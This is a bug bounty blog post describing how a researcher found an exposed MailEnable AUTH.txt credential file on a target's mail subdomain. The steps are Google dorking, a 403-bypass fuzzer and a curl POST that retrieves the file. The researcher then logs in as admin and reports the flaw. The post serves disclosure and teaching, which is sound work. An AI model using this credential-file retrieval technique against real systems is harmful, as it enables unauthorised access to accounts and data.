Admin panel Bypassed Just by reading “support team quotes”

3 min readJul 11, 2024

Hi, Ajak Amico’s welcome back to another blog. This flaw was exploited by one of our followers, @cybersec_praveenarsh so today in this blog I will show how He bypassed the admin panel, just by reading the support team quotes, Interesting right? Before starting, if you haven’t subscribed to our channel, do subscribe, guys. Contents related to cyber security, Bug Bounty, and Digital Forensics Investigation.

Blog Credits: @cybersec_praveenarsh

Follow our Youtube Channel: @ajakcybersecurity (360 Videos)
Follow on Instagram: AjakCybersecurity
Buy me Coffee: https://buymeacoffee.com/ajak

Recon:

Let’s take my target as redacted.com As usual, I collected subdomains using subdomainfinder.c99.nl, but I got only 20+ subdomains. So, I went through the manual recon using Google Dorks.

Let’s start. I used normal dorks like “site:.target.com”, but I got repeated subdomains which I saw in subdomainfinder.c99.nl. So, let’s filter this and ignore unwanted subdomains using this dork: “site:.target.com -www -ping -cdn -connect”. Finally, I found one subdomain like mail.target.cloud.

Enumeration:

This subdomain looks like an admin and user mailing portal. I used Wappalyzer for further enumeration, which showed some basic services like Cloudflare, Apache, and PHP. However, I noticed that the mail service is provided by a third party, “MailEnable.”

I tried normal admin credentials and default passwords, but unfortunately, nothing interesting came up. It’s time to do some research. I went to the MailEnable.com support team questions and answers and noticed one question: “The AUTH.tab does not exist in my bin.” Here, I took a look at the credentials using the AUTH.tab files (it’s both on localhost and on some web servers where developers saved it to make API calls easier).

After knowing the keyword, I went to the target and added /AUTH.tab. It showed a 404 error, but /AUTH.txt returned a 403 error.

Exploitation:

I opened my Kali Linux and used my favourite 403 bypass tool, “https://github.com/Dheerajmadhukar/4-ZERO-3”. After fuzzing, I found one 200 response, which indicates that it accepts POST requests. Then, I used the following curl command:

curl -i -X POST http://mail.target.com//AUTH.txt

Inside, I found credentials (which I won’t expose here). I then tried a login attempt, and yeah, it succeeded!

Reporting:

Finally, I made a report on this to the organization and explained it well, including how to resolve the issue. After our conversation, they provided a small bounty of $25 to me because the reason for this vulnerability was due to a “third party” (shitty things).

Blog Credits: @cybersec_praveenarsh

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Hope you would have learned some information from this blog if so, kindly press that follow button for further updates & don’t forget to give credit if your bug gets triaged :) Best wishes from Ajak Cybersecurity.❤️you can also support me by buying me a coffee https://buymeacoffee.com/ajak

“கற்றவை பற்றவை🔥”

Learn Everyday, Happy Hacking 😁🙌